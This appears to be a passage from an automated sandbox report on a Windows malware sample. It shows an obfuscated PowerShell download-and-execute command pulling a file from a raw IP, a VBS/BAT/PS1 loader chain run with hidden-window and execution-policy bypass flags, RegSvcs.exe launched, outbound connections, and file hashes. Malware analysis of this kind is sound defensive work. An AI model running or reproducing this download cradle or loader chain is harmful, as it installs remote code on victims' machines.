YXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
FR 185.81.157.103:80 185.81.157.103 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.157.81.185.in-addr.arpa udp
FR 185.81.157.103:80 185.81.157.103 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
FR 185.81.157.183:9696 tcp
FR 185.81.157.183:9696 tcp

Files

memory/2056-5-0x00000210F1F70000-0x00000210F1F92000-memory.dmp

memory/2056-6-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

memory/2056-7-0x00000210F2010000-0x00000210F2020000-memory.dmp

memory/2056-8-0x00000210F2010000-0x00000210F2020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5gokor4.mpf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2056-20-0x00000210F2010000-0x00000210F2020000-memory.dmp

memory/2056-23-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4800-27-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

memory/4800-28-0x0000021DEC520000-0x0000021DEC530000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa8efa56e1e40374bbd21e0e469dceb7
SHA1 33a592799d4898c6efdd29e132f2f76ec51dbc08
SHA256 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512 ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

C:\Users\Public\hich.ps1

MD5 8469f5b76df0f510fe02b1eab0f57226
SHA1 7ad6c79dc42aafd7b813353c8bdcb1204c376621
SHA256 a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279
SHA512 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4

memory/4800-40-0x0000021DEE6A0000-0x0000021DEE6D4000-memory.dmp

memory/3484-42-0x0000000000400000-0x0000000000416000-memory.dmp

memory/4800-41-0x0000021DEC520000-0x0000021DEC530000-memory.dmp

memory/4800-44-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

memory/3484-45-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/3484-46-0x0000000003200000-0x0000000003210000-memory.dmp

memory/3484-47-0x0000000005FC0000-0x0000000006564000-memory.dmp

memory/3484-48-0x0000000005C00000-0x0000000005C92000-memory.dmp

memory/3484-49-0x0000000005BF0000-0x0000000005BFA000-memory.dmp